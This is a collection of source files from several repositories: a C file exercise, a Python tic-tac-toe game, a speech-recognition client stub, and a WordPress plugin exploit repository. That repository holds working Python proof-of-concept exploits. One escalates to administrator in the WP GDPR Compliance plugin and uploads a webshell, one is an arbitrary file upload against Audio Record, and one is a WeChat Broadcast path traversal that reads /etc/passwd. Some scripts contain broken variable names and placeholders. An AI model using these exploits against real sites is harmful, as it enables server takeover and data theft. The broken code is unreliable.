"is_vendor": false, "language": "C", "length_bytes": 382, "license_type": "no_license", "max_line_length": 52, "num_lines": 19, "path": "/eliotjang_project/FileProcessing_chapter4/FileProcessing/fputc.c", "repo_name": "eliotjang/File_Processing", "src_encoding": "UHC", "text": "#include <stdio.h>\nint main() {\n\tFILE* fp1, * fp2;\n\n\tif ((fp1 = fopen(\"test.txt\", \"w\")) == NULL) {\n\t\tprintf(\"file open error!\\n\");\n\t\treturn 0;\n\t}\n\n\tfputs(\"Hello, everyone \\n 첫번째 파일 오픈 테스트임 \\n\", fp1);\n\n\tif ((fp2 = fopen(\"test.txt\", \"a\")) == NULL) {\n\t\tprintf(\"file open error!\\n\");\n\t\treturn 0;\n\t}\n\n\tfputs(\"두 번째 파일 오픈 테스트?\", fp2);\n\treturn 0;\n}" } ]
7
silviappendino/CODE-IN-PLACE
https://github.com/silviappendino/CODE-IN-PLACE
ade52e703acfe066d6b82a3e81114de1fdfa0c20
678b68ab5ee016be44caa3ee694be45c7e767f82
f207e273b2c7bb771c50a46a8c205f6ee81ca018
refs/heads/master
2023-06-20T20:06:58.574816
2021-07-22T14:39:59
2021-07-22T14:39:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5177842378616333, "alphanum_fraction": 0.532069981098175, "avg_line_length": 36.97047805786133, "blob_id": "d77c22a4afa677a59456c2114b6a21403418e671", "content_id": "0515a6303f33d60928af2b1b01e710fd4ca1fd17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10291, "license_type": "no_license", "max_line_length": 131, "num_lines": 271, "path": "/main.py", "repo_name": "silviappendino/CODE-IN-PLACE", "src_encoding": "UTF-8", "text": "# Players Object\nclass player:\n def __init__(self, name):\n self.name = name\n\n def get_best_score(self, name):\n self.file = name + '.txt'\n if os.path.isfile(self.file): #module qui verifie que le file existe. Si oui, read, sinon return 0\n _playerFile = open(self.file, 'r') #r serve per poter leggere\n return float(_playerFile.read())\n _playerFile.close()\n else:\n return 0\n\n def save_best_score(self, nowscore):\n self.nowscore = str(nowscore)\n _playerFile = open(self.file, 'w') #mode Write et ça le vide pour ecrire nouveau record\n _playerFile.write(self.nowscore)\n _playerFile.close()\n\n#ask player name\ndef ask_player_name(n):\n _player = \"\"\n while len(_player) == 0:\n _player = input(\"\\nPlayer \" + n + \" enter your name: \")\n return _player\n\n#ask level (E or D)\ndef ask_level():\n _level = \"\"\n while _level.upper() != \"E\" and _level.upper() != \"D\":\n _level=input(\"\\nThere are 2 levels of difficulty: \\n \\nE is Easy \\nD is difficult \\n \\nThe level chosen is \")\n return _level.upper()\n\n# print board with available numbers\ndef game_board():\n print(\"\\t | |\")\n print(\"\\t {} | {} | {}\".format(gameboard[0], gameboard[1], gameboard[2]))\n print('\\t_____|_____|_____')\n print(\"\\t | |\")\n print(\"\\t {} | {} | {}\".format(gameboard[3], gameboard[4], gameboard[5]))\n print('\\t_____|_____|_____')\n print(\"\\t | |\")\n print(\"\\t {} | {} | {}\".format(gameboard[6], gameboard[7], gameboard[8]))\n print(\"\\t | | \\n\")\n\n#Tic Tac Toe game\n# check if number input is still available\ndef check_shot(number, number_list):\n if number > 9 or number < 1:\n return \"ko\"\n if number in number_list:\n return \"ok\"\n return \"ko\"\n\n#Tic Tac Toe game\n# check if number input is still available\ndef get_first_free(number_list):\n for n in range(0, 10):\n if n in number_list:\n return n\n\n#Tic Tac Toe game\ndef check_winner(win_sol_all, player_list):\n # check if there i a win line\n for nSerie in range(0, len(win_sol_all)):\n result = all(elem in player_list for elem in win_sol_all[nSerie])\n if result:\n return True\n return False\n\n#Tic Tac Toe game\ndef check_2_of_3(all_serie_of_3, player_list, number_list):\n # check if there 2 elem in winSol_n, and return the third one... 
if available\n if len(player_list) != 2:\n return False\n for nSerie in range(0, len(all_serie_of_3)):\n if (player_list[0] in all_serie_of_3[nSerie]) and (player_list[1] in all_serie_of_3[nSerie]):\n w_list = all_serie_of_3[nSerie] # wList = winSol_n with 2 of 3 ok\n for n in range(0, 3):\n if player_list[0] != w_list[n] and player_list[1] != w_list[n]:\n w_num = w_list[n] # wNum = third (missing) num in winSol_n\n if check_shot(w_num, number_list) == \"ok\":\n return w_num\n return 0\n\n# init data\ngameboard = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nshots_list_player_X= []\nshots_list_player_O= []\nwin_sol_1 = [1, 2, 3]\nwin_sol_2 = [4, 5, 6]\nwin_sol_3 = [7, 8, 9]\nwin_sol_4 = [1, 4, 7]\nwin_sol_5 = [2, 5, 8]\nwin_sol_6 = [3, 6, 9]\nwin_sol_7 = [1, 5, 9]\nwin_sol_8 = [3, 5, 7]\nwin_sol_all = [win_sol_1, win_sol_2, win_sol_3, win_sol_4, win_sol_5, win_sol_6, win_sol_7, win_sol_8]\n\n#Game Difficult\ndef game_1player_D(_name_player_X): # against the PC\n _tot_time_player_X = 0\n _the_winner_is = \"nobody\"\n\n for n_play in range(1, 6):\n # player X is playing...\n # print(\" \")\n x = game_board()\n clock = datetime.datetime.now().timestamp()\n shot_player_X = int(input(_name_player_X + \" enter a cell number within the range (1-9): \"))\n shot_ok = check_shot(shot_player_X, gameboard)\n while shot_ok != \"ok\":\n x = game_board()\n shot_player_X = int(input(str(\n shot_player_X) + \" was already played or is not valid. Please enter another cell number within the range (1-9): \"))\n shot_ok = check_shot(shot_player_X, gameboard)\n\n # stop time for playerX and cumul time\n _tot_time_player_X += (datetime.datetime.now().timestamp() - clock)\n # update board and shots played by Player X\n print(\" \")\n gameboard[shot_player_X - 1] = \"x\"\n shots_list_player_X.append(shot_player_X)\n\n # check if player X is the winner\n if check_winner(win_sol_all, shots_list_player_X):\n print(_name_player_X + \" YOU WIN!\", \"\\n\")\n _the_winner_is = \"X\"\n break\n\n # \"PC\" is playing...\n if n_play < 5:\n if n_play == 1: # 1st shot = 5 or first availaible\n shot_player_O = 5\n if check_shot(5, gameboard) == \"ok\":\n shot_player_O = 5\n else:\n shot_player_O = get_first_free(gameboard)\n else:\n shot_player_O = check_2_of_3(win_sol_all, shots_list_player_X,\n gameboard) # defending!! stop player X choosing the 3rd of winSol\n if shot_player_O == 0:\n shot_player_O = check_2_of_3(win_sol_all, shots_list_player_O,\n gameboard) # attacking!! search 3rd of winSol in PC shotslist\n if shot_player_O == 0:\n shot_player_O = get_first_free(gameboard)\n\n # update board and shots played by Player X\n gameboard[shot_player_O - 1] = \"o\"\n shots_list_player_O.append(shot_player_O)\n print(\" \")\n print(\"PC has played... \\n \")\n\n # check if PC is the winner\n if check_winner(win_sol_all, shots_list_player_O):\n _the_winner_is = \"_PC\"\n break\n return [_tot_time_player_X, 0, _the_winner_is]\n\n#Game Easy\ndef game_1player_E(_name_player_X): # against the PC\n _tot_time_player_X = 0\n # _totTimePlayerO = 0\n _the_winner_is = \"nobody\"\n\n for n_play in range(1, 6):\n # player X is playing...\n # print(\" \")\n x = game_board()\n clock = datetime.datetime.now().timestamp()\n shot_player_X = int(input(_name_player_X + \" enter a cell number within the range (1-9): \"))\n shot_ok = check_shot(shot_player_X, gameboard)\n while shot_ok != \"ok\":\n # print(\" \")\n x = game_board()\n shot_player_X = int(input(str(\n shot_player_X) + \" was already played or is not valid. 
Please enter another cell number within the range (1-9): \"))\n shot_ok = check_shot(shot_player_X, gameboard)\n\n # stop time for playerX and cumul time\n _tot_time_player_X += (datetime.datetime.now().timestamp() - clock)\n # update board and shots played by Player X\n print(\" \")\n gameboard[shot_player_X - 1] = \"x\"\n shots_list_player_X.append(shot_player_X)\n\n # check if player X is the winner\n if check_winner(win_sol_all, shots_list_player_X):\n print(_name_player_X + \" YOU WIN!\", \"\\n\")\n _the_winner_is = \"X\"\n break\n\n # \"PC\" is playing...\n if n_play < 5:\n shot_player_O = random.randrange(10)\n while check_shot(shot_player_O, gameboard) != \"ok\":\n shot_player_O = random.randrange(10)\n\n # update board and shots played by the PC (player O)\n gameboard[shot_player_O - 1] = \"o\"\n shots_list_player_O.append(shot_player_O)\n print(\" \")\n print(\"PC has played... \\n \")\n\n # check if PC is the winner\n if check_winner(win_sol_all, shots_list_player_O):\n _the_winner_is = \"_PC\"\n break\n return [_tot_time_player_X, 0, _the_winner_is]\n\ndef display_final_result(_the_winner_is, _name_player_X, _tot_time_player_X, _tot_time_player_O):\n x = game_board()\n\n if _the_winner_is == \"X\":\n ## create object to manage the player's best-score file\n player_X = player(_name_player_X)\n best_score_X = player_X.get_best_score(_name_player_X)\n print(_name_player_X + \" won in \" + str(_tot_time_player_X) + \" seconds\")\n print(\"\\n\" + _name_player_X + \"'s last best time was \" + str(best_score_X))\n if best_score_X == 0 or _tot_time_player_X < best_score_X: # compare times numerically, not as strings\n print(\"\\n\" + _name_player_X + \"'s new best time is \" + str(_tot_time_player_X))\n player_X.save_best_score(_tot_time_player_X)\n\n elif _the_winner_is == \"_PC\":\n print(_name_player_X + \" YOU LOST!\")\n\n else:\n print(\"NO WINNER... try again!\")\n\ndef user_menu():\n print(\"===============================\")\n print(\"\\t Main Menu\")\n print(\"===============================\\n\")\n print(\"\\t Your choice\\n\")\n print(\"\\t 1. Play Game\")\n print(\"\\t 2. Display best score\")\n print(\"\\t 3. Exit Game\\n\")\n print(\"===============================\")\n\n while True:\n your_choice = int(input(\"\\nPlease enter your choice : \"))\n if (your_choice > 0 and your_choice < 4):\n if your_choice == 1:\n # ask player's name\n name_player_X = ask_player_name(\"X\")\n level=ask_level()\n print()\n if level.upper() == \"D\":\n x = game_1player_D(name_player_X)\n else:\n x = game_1player_E(name_player_X)\n tot_time_player_X = round(x[0], 2)\n tot_time_player_O = 0\n display_final_result(x[2], name_player_X, tot_time_player_X, tot_time_player_O)\n elif your_choice == 2:\n name_player_score = ask_player_name(\"X\")\n player_X = player(name_player_score)\n print(\"\\n Your best score is : \" + str(player_X.get_best_score(name_player_score)))\n elif your_choice == 3:\n break\n else:\n print(\"\\nINVALID INPUT... Please enter a number between 1 and 3\")\n\n# end of Functions definitions\nimport datetime, os.path, random\n\n# execute Program\nuser_menu()\n" } ]
1
koldbreww/wp-plugins-poc
https://github.com/koldbreww/wp-plugins-poc
8e8c9dbd4e24c27b319f78c35d7d237a2b819f4e
eeb6772ddfc091074366c7ac09bdf7caef4621d5
c46826059595fa7fb0903e82b5785bd2adb7aac8
refs/heads/master
2020-04-17T18:36:13.666230
2019-01-21T16:01:35
2019-01-21T16:01:35
166,833,300
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5799372792243958, "alphanum_fraction": 0.58411705493927, "avg_line_length": 28.030303955078125, "blob_id": "15bd8f688f3507ed806776cf10c48e65d2b1cb55", "content_id": "c352220572beb9e6e1a2182a105f714827aa55a3", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 957, "license_type": "no_license", "max_line_length": 91, "num_lines": 33, "path": "/PoCs/wechat-broadcast/exploit.py", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "import sys\nfrom urllib import request\n\ndef exploit(host):\n \"\"\" WeChat Broadcast Plugin Exploit PoC\n \n Input: Target Host URL\n Output: URL\n \"\"\"\n \n base_url = host\n print(\"[+] Exploit WeChat Broadcast Plugin @ {}\".format(base_url))\n print(\"[~] Let's check if our target vulnerable plugin is installed.\")\n\n target_url = \"{}/wp-content/plugins/wechat-broadcast/wechat/Image.php\".format(base_url)\n response = request.urlopen(target_url)\n if response.getcode() == 200:\n print(\"[+] Target Exists. Let the exploit begin.\")\n else:\n return False\n \n cmd = \"../../../../../../../../../../etc/passwd\"\n attack_url = \"{}?url={}\".format(target_url, CMD)\n return attack_url\n\n\nif __name__ == \"__main__\":\n try:\n exploit(TARGET_HOST)\n except:\n print(\"[-] Unexpected error while exploiting...\")\n print(\" Error: {}\".format(sys.exc_info()[0]))\n print(\"Usage: exploit.py [host]\")" }, { "alpha_fraction": 0.7153598070144653, "alphanum_fraction": 0.7545650005340576, "avg_line_length": 52.228572845458984, "blob_id": "a87c06e35163fbf9c5795b30405b2099d10507f9", "content_id": "d4976acab1be85fc078a5470b547408469e16afa", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1862, "license_type": "no_license", "max_line_length": 315, "num_lines": 35, "path": "/README.md", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "# WordPress Plugin PoCs\n\nWordPress Plugin PoCs based on 1-Day WordPress Plugin Vulnerability\n\n\n\n## :warning: Legal Disclaimer - Use At Your Own Risk :warning:\n\nThis project is made for EDUCATIONAL and ETHICAL TESTING purposes ONLY. Using of source code in this repository for attacking targets without prior mutual consent is ILLEGAL. \n\nI take **NO** responsibility and/or liability for how you choose to use any of information including source code in this repository. By accessing and using any of files in this repository, you AGREE TO USE AT YOUR OWN RISK. 
Once again, ALL files available here are for EDUCATIONAL and ETHICAL TESTING purposes ONLY.\n\n## List of PoCs\n\n> All PoCs are written in Python 3.6.8\n\n- [WP GDPR Compliance 1.4.2](./PoCs/gdpr-compliance)\n - Vulnerability Type: Remote Code Execution\n - Vulnerable Version: WP GDPR Compliance 1.4.2 or Lower\n - Dependency: [Mailhog](https://github.com/mailhog/MailHog)\n - References:\n - [WordPress WP GDPR Compliance Plugin Privilege Escalation (Rapid7/Metasploit)](https://www.rapid7.com/db/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc)\n - [CVE-2018-19207 (CVE Details)](https://www.cvedetails.com/cve/cve-2018-19207)\n- [Audio Record 1.0](./PoCs/audio-record/exploit.py)\n - Vulnerability Type: Arbitrary File Upload\n - Vulnerable Version: Audio Record 1.0 or Lower\n - References\n - [WordPress Plugin Audio Record 1.0 - Arbitrary File Upload (ExploitDB)](https://www.exploit-db.com/exploits/46055)\n\n- [WeChat Broadcast 1.2.0](./PoCs/wechat-broadcast)\n - Vulnerability Type: Local File Inclusion\n - Vulnerable Version: WeChat Broadcast 1.2.0 or Lower\n - References\n - [CVE-2018-16283 (CVE Details)](https://www.cvedetails.com/cve/CVE-2018-16283/)\n - [WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion (ExploitDB)](https://www.exploit-db.com/exploits/45438)" }, { "alpha_fraction": 0.5972062945365906, "alphanum_fraction": 0.6073963642120361, "avg_line_length": 40.0093879699707, "blob_id": "3a343bfab31a0af01bf2e8ee0553f1882e6881ba", "content_id": "2519d284503444cc8582ef11ba60980964413a50", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8734, "license_type": "no_license", "max_line_length": 154, "num_lines": 213, "path": "/PoCs/gdpr-compliance/exploit.py", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "import sys\nimport json\nimport hashlib\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib import request, parse\n\ndef send_request(queryUrl, data):\n \"\"\" Wrapper for sending a request.\n\n Input: queryUrl (str), data (dict)\n Output: [ response_code (int), response_body (str) ]\n \"\"\"\n try:\n print(\"Send request to {}...\".format(queryUrl))\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n if data is None:\n # GET request (payload == None)\n req = request.Request(queryUrl, headers=headers)\n resp = request.urlopen(req)\n else:\n # POST request (payload != None)\n req = request.Request(queryUrl, headers=headers, data=data.encode(\"utf-8\"))\n resp = request.urlopen(req)\n return [resp.getcode(), resp.read().decode(\"utf-8\")]\n except:\n print(\"[-] Unexpected error while sending a request to {}.\".format(queryUrl))\n return False, []\n\n\ndef exploit(host):\n \"\"\" WP GDPR Compliance Plugin Exploit PoC\n \n Input: Host Address\n Output: URL of Uploaded PHP File\n \"\"\"\n\n NOERROR = '{\"message\":\"\",\"error\":\"\"}' \n baseUrl = host\n print(\"\\nExploit WP GDPR Compliance Plugin @ {}\\n\".format(baseUrl))\n print(\"[~] Let's check if our target vulnerable plugin is installed.\")\n\n # Check if plugin is installed or not\n target_url = \"{}/wp-content/plugins/wp-gdpr-compliance/readme.txt\".format(baseUrl)\n respCode, _ = send_request(target_url, None)\n if respCode is 200:\n print(\"[+] Target Exists. Let the exploit begin.\")\n else:\n print(\"[-] Cannot find target. 
Please check the plugin installation path.\")\n return False\n\n # Get ajaxSecurity for POST\n respCode, respBody = send_request(baseUrl, None)\n ajaxSecurityVal = \"\"\n if respCode is 200:\n soup = BeautifulSoup(respBody, \"html.parser\")\n for item in soup.findAll(\"script\"):\n if \"ajaxSecurity\" in item.text:\n ajaxSecurityVal = (item.text).split('\"ajaxSecurity\":\"')[1]\n ajaxSecurityVal = ajaxSecurityVal.split('\"')[0]\n else:\n print(\"[-] Not able to access index page.\")\n return False\n\n if ajaxSecurityVal == \"\":\n print(\"[-] Not able to obtain the value of ajaxSecurity.\")\n return False\n\n # Request POST to enable sign up\n queryUrl = \"{}/wp-admin/admin-ajax.php\".format(baseUrl)\n data = 'action=wpgdprc_process_action&security='\n data = data + ajaxSecurityVal\n data = data + '&data={\"type\":\"save_setting\",\"append\":false,\"option\":\"users_can_register\",\"value\":\"1\"}'\n _, respBody = send_request(queryUrl, data)\n if NOERROR in respBody:\n print(\"[+] Successfully set option to anyone can register.\")\n else:\n print(\"[-] Failure to set anyone can register.\")\n return False\n\n # Request POST for signing up as Admin\n queryUrl = \"{}/wp-admin/admin-ajax.php\".format(baseUrl)\n data = \"action=wpgdprc_process_action&security=\"\n data = data + ajaxSecurityVal\n data = data + '&data={\"type\":\"save_setting\",\"append\":false,\"option\":\"default_role\",\"value\":\"administrator\"}'\n _, respBody = send_request(queryUrl, data)\n if NOERROR not in respBody:\n print(\"[-] Failure to set default role as admin.\")\n return False\n print(\"[+] Successfully set option to default role as admin.\")\n\n # Delete all messages in mailhog - Reset SMTP Mail server\n queryUrl = \"http://localhost:8025/api/v1/messages\"\n resp = requests.delete(queryUrl)\n if resp.status_code != 200:\n print(\"[-] Error while removing messages on MailHog\")\n return False\n print(\"[+] Removed all messages on MailHog\")\n \n # Sign up a new user\n queryUrl = \"{}/wp-login.php?action=register\".format(baseUrl)\n data = \"user_login={}&user_email={}&redirect_to=/login&wp-submit=Register\".format(USERNAME, EMAIL)\n respCode, respBody = send_request(queryUrl, data)\n if respCode != 404:\n if \"login_error\" in respBody:\n print(\"[-] There was an error while signing up.\")\n soup = BeautifulSoup(respBody, \"html.parser\")\n errormsg = soup.find(\"div\", {\"id\":\"login_error\"})\n print(errormsg.text)\n return False\n print(\"[+] Successfully registered to target WP Site.\")\n \n # Parse confirmation email to get key from mailhog\n queryUrl = \"http://localhost:8025/api/v1/messages\"\n setpwUrl = \"\"\n setpwKey = \"\"\n respCode, respBody = send_request(queryUrl, None)\n if respCode is 200:\n messages = json.loads(respBody)\n for message in messages:\n if \"Raw\" in message:\n msgRaw = message[\"Raw\"]\n if \"Data\" in msgRaw:\n msgData = msgRaw[\"Data\"]\n if \"To set your password, visit the following address\" in msgData:\n msgData = msgData.split(\"\\r\\n\\r\\n\")\n for data in msgData:\n if (\"login.php\" in data) and (\"action=rp&key=\" in data):\n setpwKey = (data.split(\"key=\")[1]).split(\"&\")[0]\n setpwUrl = data[1:-1]\n else:\n print(\"[-] Cannot find confirmation email from mailhog.\")\n return False\n \n # Exception for key not found error\n if (setpwKey == \"\") or (setpwUrl == \"\"):\n print(\"[-] Cannot retrive password reset URL from mailhog.\")\n return False\n \n print(\"[+] Successfully retrive the reset password page URL from the email.\")\n\n # Reset password with the 
key obtained from Mailhog\n wphash = hashlib.md5(baseUrl.encode(\"utf-8\")).hexdigest()\n wpcookieKey = \"wp-resetpass-{}\".format(wphash)\n wpcookieVal = \"{}%3A{}\".format(USERNAME, setpwKey)\n queryUrl = \"{}/wp-login.php?action=resetpass\".format(baseUrl)\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n cookies = { \n 'wordpress_test_cookie': 'WP+Cookie+check', \n wpcookieKey: wpcookieVal \n }\n data = { \n 'pass1':PASSWORD, \n 'pass1-text':PASSWORD, \n 'pass2':PASSWORD, \n 'rp_key': setpwKey, \n 'wp-submit':'Reset Password'\n }\n resp = requests.post(queryUrl, headers=headers, cookies=cookies, data=data)\n if \"Your password has been reset.\" not in resp.text:\n print(\"[-] Cannot reset password.\")\n return False\n print(\"[+] Successfully reset the password of {}.\".format(USERNAME))\n \n # Login to WP Admin\n queryUrl = \"{}/wp-login.php\".format(baseUrl)\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n cookies = { \"wordpress_test_cookie\": \"WP+Cookie+check\" }\n data = {\n \"log\": USERNAME,\n \"pwd\": PASSWORD,\n \"wp-submit\": \"Log In\",\n \"redirected_to\": \"http://localhost:8000/wp-admin/\",\n \"testcookie\": \"1\"\n }\n resp = requests.post(queryUrl, headers=headers, cookies=cookies, data=data)\n if len(resp.history) > 0:\n cookiesLoggedin = resp.history[0].cookies.get_dict()\n else:\n print(\"[-] Cannot find login cookies from history of logging in.\")\n return False\n print(\"[+] Successfully Logged in to WP Admin panel.\")\n\n # Upload webshell thru plugins\n queryUrl = \"{}/wp-admin/plugin-install.php\".format(baseUrl)\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n resp = requests.get(queryUrl, headers=headers, cookies=cookiesLoggedin)\n if \"_wpnonce\" in resp.text:\n soup = BeautifulSoup(resp.text, \"html.parser\")\n wpnonce = soup.find(\"input\", {\"name\":\"_wpnonce\"})['value']\n wp_http_referer = soup.find(\"input\", {\"name\":\"_wp_http_referer\"})['value']\n else:\n print(\"[-] Cannot find wpnonce from response text.\")\n return False\n print(\"[+] Successfully retrive wpnonce and wp_http_referer\")\n\n queryUrl = \"{}/wp-admin/update.php?action=upload-plugin\".format(baseUrl)\n headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)' }\n fileobj = open(\"wp-shell.zip\", \"rb\")\n data = {\"_wpnonce\":wpnonce, \"_wp_http_referer\":wp_http_referer}\n resp = requests.post(queryUrl, headers=headers, cookies=cookiesLoggedin, data=data, files={\"pluginzip\": (\"wp-shell.zip\", fileobj, 'application/zip')})\n print(\"[+] Successfully upload webshell plugin. Please visit {}/wp-content/plugins/wp-shell/wp-shell.php\".format(baseUrl))\n result_url = \"{}/wp-content/plugins/wp-shell/wp-shell.php\".format(baseUrl)\n return result_url\n\n\nif __name__ == \"__main__\":\n \"\"\" Let's exploit! 
\"\"\"\n try:\n exploit(TARGET_HOST)\n except:\n print(\"[-] Unexpected error while exploiting...\")\n print(\" Error: {}\".format(sys.exc_info()[0]))" }, { "alpha_fraction": 0.7975460290908813, "alphanum_fraction": 0.7990797758102417, "avg_line_length": 58.3636360168457, "blob_id": "f70fc7f4cd0a7905fc8358cc23a5c2c80431738a", "content_id": "e35147006e52ba8de272c905683fd9f2225df085", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 652, "license_type": "no_license", "max_line_length": 315, "num_lines": 11, "path": "/PoCs/README.md", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "# WordPress Plugin PoCs\n\nWordPress Plugin PoCs based on 1-Day WordPress Plugin Vulnerability\n\n\n\n## :warning: Legal Disclaimer - Use At Your Own Risk :warning:\n\nThis project is made for EDUCATIONAL and ETHICAL TESTING purposes ONLY. Using of source code in this repository for attacking targets without prior mutual consent is ILLEGAL. \n\nI take **NO** responsibility and/or liability for how you choose to use any of information including source code in this repository. By accessing and using any of files in this repository, you AGREE TO USE AT YOUR OWN RISK. Once again, ALL files available here are for EDUCATIONAL and ETHICAL TESTING purposes ONLY." }, { "alpha_fraction": 0.5432258248329163, "alphanum_fraction": 0.5509677529335022, "avg_line_length": 26.210525512695312, "blob_id": "f2b57a06e4e831e7113601bc0657f90ed3adab8a", "content_id": "962a8391be5f1812572c767bd8d9a5ebadea322e", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1550, "license_type": "no_license", "max_line_length": 100, "num_lines": 57, "path": "/PoCs/audio-record/exploit.py", "repo_name": "koldbreww/wp-plugins-poc", "src_encoding": "UTF-8", "text": "import sys\nimport requests\nimport time\nimport math\nimport binascii\nfrom uniqid import uniqid\n\ndef exploit(host):\n \"\"\" Audio Record 1.0 Exploit PoC \n \n Input: Target Host URL\n Output: URL of Uploaded File\n \"\"\"\n\n target_page = \"{}/wp-admin/admin-ajax.php\".format(host)\n\n files = {\n \"audio-blob\": (\n \"blob\",\n WEBSHELL\n )\n }\n\n data = {\n \"audio-filename\":FILENAME,\n \"action\":\"save_record\",\n \"course_id\":\"undefined\",\n \"unit_id\":\"undefined\"\n }\n \n s = requests.Session()\n first_uniqid = uniqid()\n req = s.post(target_page, data=data, files=files)\n second_uniqid = uniqid()\n diff = (int(second_uniqid,16) - int(first_uniqid,16)) * 10\n first_uniqid_int = int(first_uniqid,16)\n content = req.content.decode(\"ascii\")\n \n if content == \"1\":\n for i in range(first_uniqid_int, first_uniqid_int+diff):\n target_url = \"{}/wp-content/uploads/{YEAR}/{MONTH}/{:x}_{}\".format(host,int(i),filename)\n req = s.get(target_url)\n if req.status_code == requests.codes.ok:\n print(\"Target URL: \" + target_url)\n return \"Found\"\n break\n print(\"[-] Cannot find PHP file\")\n else:\n print(\"[-] Error while processing requests.\")\n\nif __name__ == \"__main__\":\n try:\n exploit(TARGET_HOST)\n except:\n print(\"[-] Unexpected error while exploiting...\")\n print(\" Error: {}\".format(sys.exc_info()[0]))\n print(\"Usage: exploit.py [host]\")" } ]
5
BanriIkku/kotonoha
https://github.com/BanriIkku/kotonoha
94b506a87d708b36852fe93298a87714b0b4b495
0d4f7a439a6350bb890d61906530462f84423860
5332f5a1f2442dc09979d26e12db0ff326123ae9
refs/heads/master
2020-07-06T00:41:08.543446
2019-09-20T11:08:32
2019-09-20T11:08:32
202,834,187
1
4
BSD-3-Clause
2019-08-17T04:16:14
2019-09-20T11:08:35
2019-10-12T08:20:54
Python
[ { "alpha_fraction": 0.5333333611488342, "alphanum_fraction": 0.5333333611488342, "avg_line_length": 6.5, "blob_id": "715d7fd650ec5ed8c4dbdda2721a6341ae5f0611", "content_id": "a9f506c1be255d7f4e7df7664a02f9b298ff1d47", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 15, "license_type": "permissive", "max_line_length": 10, "num_lines": 2, "path": "/Documentation/ReadMe.md", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "# KOTONOHA\n---\n" }, { "alpha_fraction": 0.7133105993270874, "alphanum_fraction": 0.7167235612869263, "avg_line_length": 9.068965911865234, "blob_id": "948c29676578596df99241dda77ad3aa1fd00130", "content_id": "d7d23170239513cd17f637b672922b0122ad53a0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 355, "license_type": "permissive", "max_line_length": 63, "num_lines": 29, "path": "/README.md", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "# KOTONOHA\n---\n\n## About\n\njuliusを使った音声認識アプリ\n\n## Features\n\n1. ローカルのマイクからWavファイルを生成する。\n\n\n## Tools and Assets\n\n\n## Release notes\n\n\n## License and contributions\n\n\n## Getting started for developers\n\n\n## Documentation\n\n## References\n\n[julius-speech/julius](https://github.com/julius-speech/julius)\n\n" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 34, "blob_id": "fefda349986f6b352fd2b9ffebc7995f8e570183", "content_id": "ec723ddab14d9ca86a74d416ca92489f9cd617b2", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36, "license_type": "permissive", "max_line_length": 34, "num_lines": 1, "path": "/Client/python/config.py", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "\nurl = \"http://serverAddress:10500\"\n" }, { "alpha_fraction": 0.7573529481887817, "alphanum_fraction": 0.7573529481887817, "avg_line_length": 11.363636016845703, "blob_id": "ccfda788b211d1f0a021839d65a6b5ce307b066e", "content_id": "b5fa4cd70368458e474e223e01ff8532eea6234f", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 250, "license_type": "permissive", "max_line_length": 44, "num_lines": 11, "path": "/Client/ReadMe.md", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "# KOTONOHA\n---\n\n# Install\n\nサーバへwaveファイルを送信するため、「requests」ライブラリを使用しています。\n下記のコマンドで「requests」ライブラリを追加してください。\n\n```\npip install requests\n``` " }, { "alpha_fraction": 0.6577540040016174, "alphanum_fraction": 0.6844919919967651, "avg_line_length": 22.25, "blob_id": "13a410f9f0fedc8bc1170b129394b50b63cfe241", "content_id": "f557e8d136550b21e30ebc3e2a6e7250867e1acf", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 187, "license_type": "permissive", "max_line_length": 40, "num_lines": 8, "path": "/Client/python/localToServer/request.py", "repo_name": "BanriIkku/kotonoha", "src_encoding": "UTF-8", "text": "import requests\nurl = \"http://serverAddress:10500\"\nfiles = {\n 'myFile': open('wavefile.wav', 'rb')\n}\nsession = requests.Session()\nreq = session.post(url, files=files)\nprint(req.text)\n\n" } ]
5
iamgalina/book_store_tests
https://github.com/iamgalina/book_store_tests
9f6e0b2f84bd5f12afc692f7fa063788d952aabd
